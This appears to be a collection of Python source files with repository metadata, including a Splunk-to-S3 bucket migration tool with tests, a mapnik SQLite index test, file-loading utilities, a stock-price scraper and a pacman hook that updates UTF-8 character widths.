# It is possible that there is MORE more buckets than indexers. In which case ...
# .... we skip this bucket, cuz we already have buckets by the same name on ALL the indexers
if num_guid_trys > len(indexerGuids) :
print "It is odd that index "+indexName+" has more than "+str(len(indexerGuids))+" buckets all with the same name "+bucketId
break
continue
# Store bucket ID.
#print "GUID = "+guid+" Found a new bucketID "+bucketId
bucketIds[guid].append(bucketId)
# We don't have checksums for c2f buckets...
# DEBUG: print "%50s\t %s" % (realIndexDirName, bucketName)
# DEBUG: print "INDEX NAME: %s" % indexName
if realIndexDirName in csumDict and bucketName in csumDict[realIndexDirName]:
# DEBUG: print "%20s\t %s" % (realIndexDirName, bucketName)
# FIXME: hack per freezeBucketToS3.py ...
csumPrefix = "%s/%s/%s/" % (realIndexDirName, bucketDirTypeToDirName(dirType), bucketName)
# DEBUG: print "searching with %s" % csumPrefix
count = 0
for k, v in csumDict[realIndexDirName][bucketName].items():
# DEBUG: print "\t\t\t%s\t %s" % (k, v)
if k.startswith(csumPrefix):
count += 1
# two spaces so works with md5sum cli cmd...
csumColls[guid].append("%s %s" % (v, k))
# DEBUG: print "found %d matches" % count
# Store bucket.
#print "Storing bucket "+indexName+" "+dirType+" "+bucketParentDir+" "+bucketName
bucketColls[guid].addBuckets(indexName, dirType, bucketParentDir, (bucketName,))
# Report progress ,,,,,
#if len(bucketColls[guid])/step > prev_num :
# prev_num = len(bucketColls[guid])/step
# print selected_index+" => "+str(prev_num)
# Next guid...
guidOff = (guidOff + 1 < len(indexerGuids)) and guidOff + 1 or 0
remainingCopies -= 1
# DEBUG: print csumColls
# Save to file and print a bit.
print
for guid in indexerGuids:
buckOutFile = "dest_buckets_%s_%s.json" % (guid, selected_index)
print "Saving %d buckets to file=%s ..." % (len(bucketColls[guid]),
buckOutFile)
bucketColls[guid].toFile(buckOutFile)
if len(csumColls[guid]):
csumOutFile = "dest_checksums_%s_%s.md5" % (guid, selected_index)
print "Saving %d checksums to file=%s ..." % (len(csumColls[guid]),
csumOutFile)
with open(csumOutFile, "w") as outFd:
for line in csumColls[guid]:
if -1 != line.find("defaultdb%s" % os.sep): # TODO os.sep ?
line = line.replace("defaultdb%s" % os.sep,
"main%s" % os.sep, 1)
outFd.write("%s\n" % line)
else:
print "No checksums found for buckets to copy to GUID=%s." % guid
print "\nDone."
class CMD_DownloadBucketsToStagingDir(object):
def __init__(self, destSubParser, cmdName):
myParser = destSubParser.add_parser(cmdName)
myParser.set_defaults(func=self.run)
myParser.add_argument("bucket_list", help="JSON file from gen-new-bucket...")
def run(self, args):
self._args = args
# Convenience...
self.instance_guid = get_instance_guid()
bucketListRE = "^dest_buckets_([\\dA-F]{8}-[\\dA-F]{4}-[\\dA-F]{4}-[\\dA-F]{4}-[\\dA-F]{12})\\.json$"
basename = os.path.basename(self._args.bucket_list)
matches = re.match(bucketListRE, basename)
if not matches:
raise Exception, "Bucket list filename must be in the format" \
" dest_buckets_<this_indexer_guid>.json, you provided" \
" filename=\"%s\"." % basename
if not matches.group(1) == self.instance_guid:
raise Exception, "Aborting: This bucket list is for Splunk indexer" \
" with GUID=%s, but my GUID is %s. It sounds like you've" \
" mixed up the various bucket lists! This will cause data" \
" duplication, so will not proceed." % (
matches.group(1), self.instance_guid)
coll = BucketCollection()
coll.fromFile(self._args.bucket_list)
# Build bucket download commands.
cmds = []
stagingDestDirBase = os.path.join(os.environ["SPLUNK_DB"], STAGING_DIR)
print "Will download data to %s.\n" % stagingDestDirBase
for index, dirType, bucketParentDir, bucketName in coll.items():
# FIXME: hack per freezeBucketToS3.py ...
realIndexDirName = getSearchableIndexName(index)
testIdxPath = os.path.join(os.environ["SPLUNK_DB"], realIndexDirName)
if not os.path.exists(testIdxPath):
raise Exception, "Aborting: The path=\"%s\" for index=%s does" \
" not exist - it looks like something is different about" \
" this indexer's configuration. Please review." % (
testIdxPath, index)
stagingDestDir = os.path.join(stagingDestDirBase, index, dirType,
bucketName)
if not os.path.exists(stagingDestDir):
os.makedirs(stagingDestDir)
cmds.append(build_s3_download_bucket_command(
stagingDestDir,
# S3 path to download from.
"%s/%s" % (bucketParentDir, bucketName)))
# Download!
for cmd in cmds:
if not run_s3_command(cmd, MODE_DOWNLOAD):
raise Exception("Download process failed, please triage and try again!")
print "Done."
class CMD_VerifyDownloadedFiles(object):
def __init__(self, destSubParser, cmdName):
myParser = destSubParser.add_parser(cmdName)
myParser.set_defaults(func=self.run)
myParser.add_argument("--c2f", action="store_true", help="Activates require workaround for c2f uploaded buckets.")
myParser.add_argument("checksum_list", help="Checksum list generated by gen-new-bucket-...")
def run(self, args):
self._args = args
# Convenience...
self.instance_guid = get_instance_guid()
csumListRE = "^dest_checksums_([\\dA-F]{8}-[\\dA-F]{4}-[\\dA-F]{4}-[\\dA-F]{4}-[\\dA-F]{12})\\.md5$"
basename = os.path.basename(self._args.checksum_list)
matches = re.match(csumListRE, basename)
if not matches:
raise Exception, "Checksum list filename must be in the format" \
" dest_checksums_<this_indexer_guid>.md5, you provided" \
" filename=\"%s\"." % basename
if not matches.group(1) == self.instance_guid:
raise Exception, "Aborting: This checksum list is for Splunk indexer" \
" with GUID=%s, but my GUID is %s. It sounds like you've" \
" mixed up the various checksum lists!" % (
matches.group(1), self.instance_guid)
def convertFilePath(path):
pieces = path.split(os.sep) # TODO os.sep??
pieces[0] = getDisplayIndexName(pieces[0])
if self._args.c2f:
for i in range(len(pieces)):
if pieces[i] == "colddb":
pieces[i] = "cold" # TODO: due to freezeBucketToS3.py
else:
for i in range(len(pieces)):
if pieces[i] == "colddb":
pieces[i] = "coldPath" # TODO: due to freezeBucketToS3.py
elif pieces[i] == "db":
pieces[i] = "homePath" # TODO: due to freezeBucketToS3.py
return os.path.join(*pieces)
stagingDestDirBase = os.path.join(os.environ["SPLUNK_DB"], STAGING_DIR)
numMatched = 0
numFailed = 0
with open(self._args.checksum_list) as csumFile:
for line in csumFile:
matched = True
# <hash><2 spaces><file path> like what md5sum uses.
hash, filepath = filter(lambda x: x.strip(), line.split(" "))
filepath = filepath.strip()
fullPath = os.path.join(stagingDestDirBase, convertFilePath(filepath))
try:
with open(fullPath, "rb") as verifFd:
actualHash = fileMd5Hash(verifFd)
if hash != actualHash:
matched = False
sys.stderr.write("MD5 did not match for file=\"%s\", expected=%s actual=%s!\n" \
% (fullPath, hash, actualHash))
sys.stderr.flush()
except IOError, e:
matched = False
sys.stderr.write("No such file: %s on host=%s!\n" % (fullPath, socket.gethostname()))
sys.stderr.flush()
if matched:
numMatched += 1
else:
numFailed += 1
if not numFailed:
print "Everything matched! Success! (%d matched)" % numMatched
else:
sys.stderr.write("There were failures. :( (%d matched, %d failed)\n" % (numMatched, numFailed))
class CMD_MoveStagedDataToIndexes(object):
def __init__(self, destSubParser, cmdName):
myParser = destSubParser.add_parser(cmdName)
myParser.set_defaults(func=self.run)
myParser.add_argument("--actually-move", action="store_true",
help="Without this, the actual move commands will not be run.")
def run(self, args):
self._args = args
stagingDestDirBase = os.path.join(os.environ["SPLUNK_DB"], STAGING_DIR)
if not os.path.exists(stagingDestDirBase):
raise Exception, "Staging directory path=\"%s\" does not exist, are you sure you downloaded data on this instance?"
if self._args.actually_move:
proc = subprocess.Popen(["splunk", "status"], stdout=subprocess.PIPE)
proc.communicate()
if 0 == proc.returncode:
raise Exception, "This command must not be used while Splunk is running."
movePairs = []
dirsToRemove = []
for indexName in os.listdir(stagingDestDirBase):
thisIdxDir = os.path.join(stagingDestDirBase, indexName)
dirsToRemove.append(thisIdxDir)
for bucketType in os.listdir(thisIdxDir):
thisBucketTypeDir = os.path.join(thisIdxDir, bucketType)
dirsToRemove.append(thisBucketTypeDir)
for bucketName in os.listdir(thisBucketTypeDir):
thisBucketDir = os.path.join(thisBucketTypeDir, bucketName)
# FIXME: hack per freezeBucketToS3.py ...
# TODO -- USE SEARCHABLE HERE
realIndexDirName = getSearchableIndexName(indexName)
destPath = os.path.join(os.environ["SPLUNK_DB"], realIndexDirName,
bucketDirTypeToDirName(bucketType), bucketName)
if not self._args.actually_move:
print "Will move: %s ==> %s" % (thisBucketDir, destPath)
movePairs.append((thisBucketDir, destPath))
if self._args.actually_move:
for src, dst in movePairs:
shutil.move(src, dst)
for oneDir in reversed(dirsToRemove):
os.rmdir(oneDir)
os.rmdir(stagingDestDirBase)
print "\nDone."
def main(rawArgs):
# Most argument parsing will be delegated to the subcommands.
mainArgParser = argparse.ArgumentParser()
subParsers = mainArgParser.add_subparsers()
# Store all registered commands here to avoid any lifecycle ambiguities.
cmds = [
CMD_GenBucketlistWarmCold(subParsers, "gen-bucketlist-warm-cold")
, CMD_GenChecksumsFromBucketlist(subParsers, "gen-checksums-from-bucketlist")
, CMD_GenRandBucketOwnersFromBucketList(subParsers, "gen-rand-bucket-owners-from-bucketlists")
, CMD_UploadBucketsToS3FromBucketList(subParsers, "upload-buckets-to-s3-from-bucketlist")
, CMD_ListAllSplunkBucketsFromS3(subParsers, "list-all-splunk-buckets-from-s3")
, CMD_GenNewBucketOwnersFromS3BucketList(subParsers, "gen-new-bucket-owners-from-s3-bucketlist")
, CMD_DownloadBucketsToStagingDir(subParsers, "download-buckets-to-staging-dir")
, CMD_VerifyDownloadedFiles(subParsers, "verify-downloaded-files")
, CMD_MoveStagedDataToIndexes(subParsers, "move-staged-data-to-indexes")
]
# Parses sys.argv implicitly.
args = mainArgParser.parse_args(rawArgs)
args.func(args)
### metadataCollection.generate_missing_checksums()
### metadataCollection.write()
### ### TODO: lazy-delete aged-out buckets
### #generate_missing_md5sums(instanceGuid, allBuckets)
### #generate_s3_upload_commands(instanceGuid, allBuckets)
if __name__ == "__main__":
main(sys.argv[1:])
def test_filter_internal_index_dirs():
"""Test function: make sure the correct index paths are removed."""
dirsBefore = [
"/home/amrit/files/cluster/test/splunk/var/lib/splunk/defaultdb/db"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/defaultdb/colddb"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/defaultdb/thaweddb"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/summarydb/db"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/summarydb/colddb"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/summarydb/thaweddb"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/fishbucket/db"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/fishbucket/colddb"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/fishbucket/thaweddb"
, "/tmp/bleh"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/blockSignature/db"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/blockSignature/colddb"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/blockSignature/thaweddb"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/historydb/db"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/historydb/colddb"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/historydb/thaweddb"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/_introspection/db"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/_introspection/colddb"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/_introspection/thaweddb"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/audit/db"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/audit/colddb"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/audit/thaweddb"
]
expectedDirsAfter = [
"/home/amrit/files/cluster/test/splunk/var/lib/splunk/defaultdb/db"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/defaultdb/colddb"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/defaultdb/thaweddb"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/summarydb/db"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/summarydb/colddb"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/summarydb/thaweddb"
, "/tmp/bleh"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/blockSignature/db"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/blockSignature/colddb"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/blockSignature/thaweddb"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/historydb/db"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/historydb/colddb"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/historydb/thaweddb"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/audit/db"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/audit/colddb"
, "/home/amrit/files/cluster/test/splunk/var/lib/splunk/audit/thaweddb"
]
# Construct the necessary data structures.
indexPathObjsBefore = [ IndexLocation("foo", x, "homePath") for x in dirsBefore ]
indexPathObjsAfter = filter_internal_index_dirs(indexPathObjsBefore)
dirsAfter = [ x.dirPath for x in indexPathObjsAfter ]
# Compare the raw filepaths to verify.
assert dirsAfter == expectedDirsAfter, \
"Filtered dirs did not match! EXPECTED:\n%s\n\nACTUAL:\n%s\n" % (
dirsAfter, expectedDirsAfter)
def test_splunkDBPaths():
# Must be structured like indexes.conf. These paths don't need to exist
# for this test.
indexConfig = {
"default" : {
},
"volume:foobar" : {
"path" : "/data/splunkvolume1"
},
"volume:badvol" : {
"badParam" : "bar",
},
"idx1" : {
"homePath" : "/data/idx1/db",
"coldPath" : "/data/idx1/colddb",
"thawedPath" : "/data/idx1/thawed"
},
"idx2" : {
"homePath" : "/data/idx2/db",
"coldPath" : "/data/idx2/colddb",
"thawedPath" : "/data/idx2/thawed"
},
"idx3" : {
"homePath" : "volume:foobar/idx3/db",
"coldPath" : "volume:foobar/idx3/colddb",
"thawedPath" : "volume:foobar/idx3/thawed"
},
"idx4" : {
"badParam" : "foo"
},
"idx5" : {
"disabled" : "true",
}
}
outPaths = splunkDBPaths(indexConfig)
outPaths2 = splunkDBPaths(indexConfig)
assert outPaths == computed_db_paths
assert outPaths2 == outPaths2
# 3 indexes * 3 paths = 9.
assert 9 == len(outPaths)
for idx in outPaths:
assert isinstance(idx, IndexLocation)
# This is sorted.
outPathsTruth = (
("idx1", "coldPath", "/data/idx1/colddb"),
("idx1", "homePath", "/data/idx1/db"),
("idx1", "thawedPath", "/data/idx1/thawed"),
("idx2", "coldPath", "/data/idx2/colddb"),
("idx2", "homePath", "/data/idx2/db"),
("idx2", "thawedPath", "/data/idx2/thawed"),
("idx3", "coldPath", "/data/splunkvolume1/idx3/colddb"),
("idx3", "homePath", "/data/splunkvolume1/idx3/db"),
("idx3", "thawedPath", "/data/splunkvolume1/idx3/thawed"),
)
for op in outPaths:
print op.indexName, op.dirPath, op.dirType
print outPathsTruth
# Sort output paths by all 3 keys...
sortedOP = sorted(outPaths, key=operator.attrgetter(
"indexName", "dirType", "dirPath"))
for i in range(len(outPathsTruth)):
assert outPathsTruth[i] == \
(sortedOP[i].indexName, sortedOP[i].dirType, sortedOP[i].dirPath)
def test_fileMd5Hash():
# 128000 aka lazy binary math: require at least two reads in hash function.
fakeFd = StringIO.StringIO("x" * 128000)
hash = fileMd5Hash(fakeFd)
# Gen'd with: echo | awk '{for (i=0; i<128000; ++i){printf("x");}}' | md5sum.
assert "8b9717dc588d653855659cb3a167ee38" == hash
def test_RoundRobinFileReader():
fakeFd1 = StringIO.StringIO(str.join("\n",
["foo",
"bar",
"baz",
"huh"]) + "\n")
fakeFd2 = StringIO.StringIO(str.join("\n",
["abcde",
"fghij",
"klmno",
"pqrst",
"uvwxy"]) + "\n")
fakeFd3 = StringIO.StringIO(str.join("\n",
["12",
"34",
"56"]) + "\n")
rrFd = RoundRobinFileReader([fakeFd1, fakeFd2, fakeFd3])
assert(3 == rrFd.numFiles())
rrFdReadOrderTruth = (
"foo",
"abcde",
"12",
"bar",
"fghij",
"34",
"baz",
"klmno",
"56",
"huh",
"pqrst",
"uvwxy")
lineCounter = 0
for line in rrFd:
assert(line == rrFdReadOrderTruth[lineCounter] + "\n")
lineCounter += 1
def test_CMD_GenBucketlistWarmCold():
# Undo cache.
global computed_db_paths
computed_db_paths = None
args = ["gen-bucketlist-warm-cold"]
main(args)
### def test_CMD_GenChecksumsFromBucketlist():
### args = ["gen-checksums-from-bucketlist"]
### main(args)
### def test_CMD_GenRandBucketOwnersFromBucketList(object):
### args = ["gen-rand-bucket-owners-from-bucketlists"]
### main(args)
| [
"esix@splunk.com"
] | esix@splunk.com |
8d74b1e0bb854a72bb32c37fb556c7fe405b41fd | 36dfa26234b46cb8e2fdeb680fc4b9ea20d594ba | /purelung/models/suppression/__init__.py | 6bb65e6a8b08fe7b607f353551d47832d0b11f29 | [
"MIT"
] | permissive | DanisAlukaev/Purelung | 862b80071ce13f44a4caab5f297fa2679d6aab66 | af7d403460ad20327488cd04af434377c3c30f9b | refs/heads/master | 2023-06-06T22:53:22.726745 | 2020-08-03T19:56:41 | 2020-08-03T19:56:41 | 284,793,444 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 105 | py | from purelung.models.suppression.bone_suppression_pt import load_bone_model_pytorch, get_suppressed_image | [
"d.alukaev@innopolis.university"
] | d.alukaev@innopolis.university |
87b4c9c295b5f43b508c4f5062977f0f628852e2 | 4a84ef702269eed582b04dbed979a24607579f52 | /src/mapnik/tests/python_tests/sqlite_rtree_test.py | 2d28adac0266d3439eb51f6e9cc4d9c5da04e236 | [] | no_license | olibook/pymapnik2 | 9ef766d759afc3efeccd988bfb7239bd73cac01e | c409fa150e203ff85e14b8fd40063267a6802e1c | refs/heads/master | 2016-08-04T11:51:35.987664 | 2013-02-18T16:01:10 | 2013-02-18T16:01:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,302 | py | #!/usr/bin/env python
from nose.tools import *
from mapnik.tests.python_tests.utilities import execution_path
from Queue import Queue
import threading
import os, mapnik
import sqlite3
def setup():
# All of the paths used are relative, if we run the tests
# from another directory we need to chdir()
os.chdir(execution_path('.'))
NUM_THREADS = 10
TOTAL = 245
DB = '../data/sqlite/world.sqlite'
TABLE= 'world_merc'
def create_ds():
ds = mapnik.SQLite(file=DB,table=TABLE)
fs = ds.all_features()
if 'sqlite' in mapnik.DatasourceCache.instance().plugin_names():
def test_rtree_creation():
index = DB +'.index'
if os.path.exists(index):
os.unlink(index)
threads = []
for i in range(NUM_THREADS):
t = threading.Thread(target=create_ds)
t.start()
threads.append(t)
for i in threads:
i.join()
eq_(os.path.exists(index),True)
conn = sqlite3.connect(index)
cur = conn.cursor()
try:
cur.execute("Select count(*) from idx_%s_GEOMETRY" % TABLE.replace("'",""))
conn.commit()
eq_(cur.fetchone()[0],TOTAL)
except sqlite3.OperationalError:
# don't worry about testing # of index records if
# python's sqlite module does not support rtree
pass
cur.close()
ds = mapnik.SQLite(file=DB,table=TABLE)
fs = ds.all_features()
eq_(len(fs),TOTAL)
os.unlink(index)
ds = mapnik.SQLite(file=DB,table=TABLE,use_spatial_index=False)
fs = ds.all_features()
eq_(len(fs),TOTAL)
eq_(os.path.exists(index),False)
ds = mapnik.SQLite(file=DB,table=TABLE,use_spatial_index=True)
fs = ds.all_features()
for feat in fs:
query = mapnik.Query(feat.envelope())
selected = ds.features(query)
eq_(len(selected.features)>=1,True)
eq_(os.path.exists(index),True)
os.unlink(index)
def test_geometry_round_trip():
test_db = '/tmp/mapnik-sqlite-point.db'
ogr_metadata = True
# create test db
conn = sqlite3.connect(test_db)
cur = conn.cursor()
cur.execute('''
CREATE TABLE IF NOT EXISTS point_table
(id INTEGER PRIMARY KEY AUTOINCREMENT, geometry BLOB, name varchar)
''')
# optional: but nice if we want to read with ogr
if ogr_metadata:
cur.execute('''CREATE TABLE IF NOT EXISTS geometry_columns (
f_table_name VARCHAR,
f_geometry_column VARCHAR,
geometry_type INTEGER,
coord_dimension INTEGER,
srid INTEGER,
geometry_format VARCHAR )''')
cur.execute('''INSERT INTO geometry_columns
(f_table_name, f_geometry_column, geometry_format,
geometry_type, coord_dimension, srid) VALUES
('point_table','geometry','WKB', 1, 1, 4326)''')
conn.commit()
cur.close()
# add a point as wkb (using mapnik) to match how an ogr created db looks
x = -122 # longitude
y = 48 # latitude
wkt = 'POINT(%s %s)' % (x,y)
# little endian wkb (mapnik will auto-detect and ready either little or big endian (XDR))
wkb = mapnik.Path.from_wkt(wkt).to_wkb(mapnik.wkbByteOrder.NDR)
values = (None,sqlite3.Binary(wkb),"test point")
cur = conn.cursor()
cur.execute('''INSERT into "point_table" (id,geometry,name) values (?,?,?)''',values)
conn.commit()
cur.close()
def make_wkb_point(x,y):
import struct
byteorder = 1; # little endian
endianess = ''
if byteorder == 1:
endianess = '<'
else:
endianess = '>'
geom_type = 1; # for a point
return struct.pack('%sbldd' % endianess, byteorder, geom_type, x, y)
# confirm the wkb matches a manually formed wkb
wkb2 = make_wkb_point(x,y)
eq_(wkb,wkb2)
# ensure we can read this data back out properly with mapnik
ds = mapnik.Datasource(**{'type':'sqlite','file':test_db, 'table':'point_table'})
fs = ds.featureset()
feat = fs.next()
eq_(feat.id(),1)
eq_(feat['name'],'test point')
geoms = feat.geometries()
eq_(len(geoms),1)
eq_(geoms.to_wkt(),'Point(-122.0 48.0)')
# ensure it matches data read with just sqlite
cur = conn.cursor()
cur.execute('''SELECT * from point_table''')
conn.commit()
result = cur.fetchone()
cur.close()
feat_id = result[0]
eq_(feat_id,1)
name = result[2]
eq_(name,'test point')
geom_wkb_blob = result[1]
eq_(str(geom_wkb_blob),geoms.to_wkb(mapnik.wkbByteOrder.NDR))
new_geom = mapnik.Path.from_wkb(str(geom_wkb_blob))
eq_(new_geom.to_wkt(),geoms.to_wkt())
# cleanup
os.unlink(test_db)
os.unlink(test_db + '.index')
if __name__ == "__main__":
setup()
[eval(run)() for run in dir() if 'test_' in run]
| [
"kiorky@cryptelium.net"
] | kiorky@cryptelium.net |
bc6f95608de9d9cb30bf5bd3e63638ab7179fcff | c5463565ac436c8bfd430c32f57146669b533850 | /3.StockWithRegex/getStockOther.py | 3afd2371c7c9fe917850954ed20188a34c9a19a5 | [] | no_license | AndyDaly90/PythonScraping | 471a2fd64fd5b12864eb3a9896abc9399bfa3843 | 12e8b71c3acb6d94c033b2fffbfa944fc2c317cd | refs/heads/master | 2016-09-01T12:52:00.651607 | 2016-02-02T16:00:06 | 2016-02-02T16:00:06 | 50,930,902 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 286 | py | from __future__ import print_function
import urllib
import re
htmlFile = urllib.urlopen("https://www.google.com/finance?q=AAPL")
htmlText = htmlFile.read()
regex = '<span id="ref_[^.]*_l">(.+?)</span>'
pattern = re.compile(regex)
result = re.findall(pattern, htmlText)
print(result)
| [
"andrew.daly@students.ittralee.ie"
] | andrew.daly@students.ittralee.ie |
82f2cb74ac91d8562d6bf1261c3940d19915f59e | 5e6ff89fcaec0f93da551e0c2237f272c8967064 | /Anudip/Anudip/asgi.py | 0f481d1a1ddb24c71d86298e6017f89a2f1d0ffe | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | IndiaCFG3/team-63 | 10478c72adba453832571239c3ec6c3573ff6ac9 | a4cfbc96b977faade9c185ac5de7754e6fef21fd | refs/heads/master | 2023-02-09T16:28:49.196488 | 2021-01-06T15:39:19 | 2021-01-06T15:39:19 | 287,280,706 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | """
ASGI config for Anudip project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Anudip.settings')
application = get_asgi_application()
| [
"jitensidhpura2000@gmail.com"
] | jitensidhpura2000@gmail.com |
8ac469d250354ff770e368d0dc803cc543d5ac0d | c42908fce35bc2afb10abd924cfd13d5fa286205 | /html2vec/base/io/basefilehandlers.py | 30f19a526fdb753f0bc6b1578280d70ce6dcfae6 | [
"MIT"
] | permissive | dpritsos/html2vec | b3866f05e7e1c1cb61f40b8f038c1a05a89a9faa | be5629d6dc2665891472c5795c191286f0de31e7 | refs/heads/master | 2023-05-13T08:30:24.485797 | 2021-06-05T07:29:06 | 2021-06-05T07:29:06 | 1,896,404 | 8 | 0 | null | 2018-10-20T13:10:43 | 2011-06-14T19:54:52 | Python | UTF-8 | Python | false | false | 3,689 | py | #
# Module: Base File Handlers
#
# Author: Dimitiros Pritsos
#
# License: BSD Style
#
# Last update: Please refer to the GIT tracking
#
""" html2vect.base.io.basefilehandlers: submodule of `html2vect` module defines the class
BasePathHandler and BaseFileHandler """
import codecs
import os
def copyfile(source, dest):
""" copyfile(): Copy a file from source to dest path. """
source_f = open(source, 'rb')
dest_f = open(dest, 'wb')
while True:
copy_buffer = source_f.read(1024*1024)
if copy_buffer:
dest_f.write(copy_buffer)
else:
break
source_f.close()
dest_f.close()
def movefile(source, dest):
""" movefile(): A UNIX compatible function for moving file from Source path
to Destination path. The Source path Hard Link is deleted """
os.link(source, dest)
os.unlink(source)
def file_list_frmpaths(basepath, filepath_l):
if basepath is None:
basepath = ''
if isinstance(filepath_l, str):
flist = [files_n_paths[2] for files_n_paths in os.walk(basepath + filepath_l)]
flist = flist[0]
fname_lst = [basepath + filepath_l + fname for fname in flist]
elif isinstance(filepath_l, list):
fname_lst = list()
for filepath in filepath_l:
flist = [files_n_paths[2] for files_n_paths in os.walk(basepath + filepath)]
flist = flist[0]
fname_lst.extend([basepath + filepath + '/' + fname for fname in flist])
else:
raise Exception(
"A String or a list of Strings was Expected as input - Stings should be file-paths"
)
# For ease of usage the filename list should be returned sorted
fname_lst.sort()
return fname_lst
class BaseFileHandler(object):
def __init__(self):
self.filename_lst = []
self.file_count = None
def __iter__(self):
return self
def next(self):
if len(self.filename_lst) == self.file_count:
raise StopIteration
xhtml = self.__load_file(
self.filename_lst[self.file_count], self.encoding, self.error_handling
)
self.file_count += 1
return xhtml
def __load_file(self, filename, encoding='utf-8', error_handling='strict'):
""" """
try:
fenc = codecs.open(filename, 'rb', encoding, error_handling)
except Exception as e:
print("BaseFileHandler.__load_file() FILE %s ERROR: %s" % (filename, e))
return None
try:
fstr = fenc.read()
except Exception as e:
print("BaseFileHandler.__load_file() FILE %s ERROR: %s" % (filename, e))
return None
finally:
fenc.close()
return fstr
def load_files(self, filename_l, encoding='utf-8', error_handling='strict'):
""" """
if isinstance(filename_l, str):
return self.__load_file(filename_l, encoding, error_handling)
elif isinstance(filename_l, list):
self.filename_lst = filename_l
self.file_count = 0
self.encoding = encoding
self.error_handling = error_handling
return self.__iter__()
else:
raise Exception("A String or a list of Strings was Expected as input")
def load_frmpaths(self, basepath, filepath_l, encoding='utf-8', error_handling='strict'):
"""This function requires hight amount of memory!"""
fname_lst = self.file_list_frmpaths(basepath, filepath_l)
return [[fname, fstr] for fname, fstr in zip(
fname_lst, self.load_files(fname_lst, encoding, error_handling))]
| [
"dpritsos@extremepro.gr"
] | dpritsos@extremepro.gr |
f3347fc64b9df518214370907ad199782662a729 | 0b9fdbb0c6e2cba0a89a9a9487584fed8024f737 | /etc/pacman.d/hooks/update-charmaps-UTF-8.py | 21050b1469b5ed112de463846bd61f4ef77491f9 | [] | no_license | MaskRay/Config | 0aca02be5f3846c4094c8e31975a504f884924a4 | c5017bb4116071ae879dc67758130468f4da7775 | refs/heads/master | 2023-08-17T00:11:26.782184 | 2023-08-16T21:15:04 | 2023-08-16T21:15:04 | 2,502,286 | 232 | 53 | null | 2022-02-12T09:18:36 | 2011-10-03T02:18:54 | Emacs Lisp | UTF-8 | Python | false | false | 2,164 | py | #!/usr/bin/env python3
import gzip, re, subprocess
def encode(x):
return '<U{:08X}>'.format(x)
width = {}
mx = 0
is_width = False
# read original width information from charmaps/UTF-8
with gzip.open('/usr/share/i18n/charmaps/UTF-8.gz') as f:
lines = f.read().decode().splitlines()
for line in lines:
if line == 'WIDTH':
is_width = True
elif line == 'END WIDTH':
is_width = False
elif is_width:
m = re.match(r'<U(\w+)>(?:\.\.\.<U(\w+)>)?\t(\d)$', line)
if m:
head = int(m.group(1), 16)
last = int(m.group(2), 16) if m.group(2) else head
mx = max(mx, last)
for code in range(head, last+1):
width[code] = m.group(3)
# incomplete list of full-width characters
for i, j in [(0x25a0, 0x27c0), # Geometric Shapes, Miscellaneous Symbols, Dingbats
(0x2b00, 0x2bf0), # Miscellaneous Symbols and Arrows
(0x1f300, 0x1f9c1)]: # Miscellaneous Symbols and Pictographs ... Supplemental Symbols and Pictographs
for code in range(i, j):
width[code] = 2
# print new charmaps/UTF-8
with gzip.open('/usr/share/i18n/charmaps/UTF-8.gz', 'wb') as f:
for line in lines:
if line == 'WIDTH':
is_width = True
f.write((line+'\n').encode())
i = 0
while i <= mx:
if i in width:
j = i+1
while j in width and width[i] == width[j]:
j += 1
if i == j-1:
f.write('{}\t{}\n'.format(encode(i), width[i]).encode())
else:
f.write('{}...{}\t{}\n'.format(encode(i), encode(j-1), width[i]).encode())
i = j
else:
i += 1
elif line == 'END WIDTH':
is_width = False
f.write((line+'\n').encode())
elif not is_width:
f.write((line+'\n').encode())
subprocess.run('localedef -i en_US -c -f UTF-8 -A /usr/share/locale/locale.alias en_US.UTF-8', shell=True)
| [
"i@maskray.me"
] | i@maskray.me |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.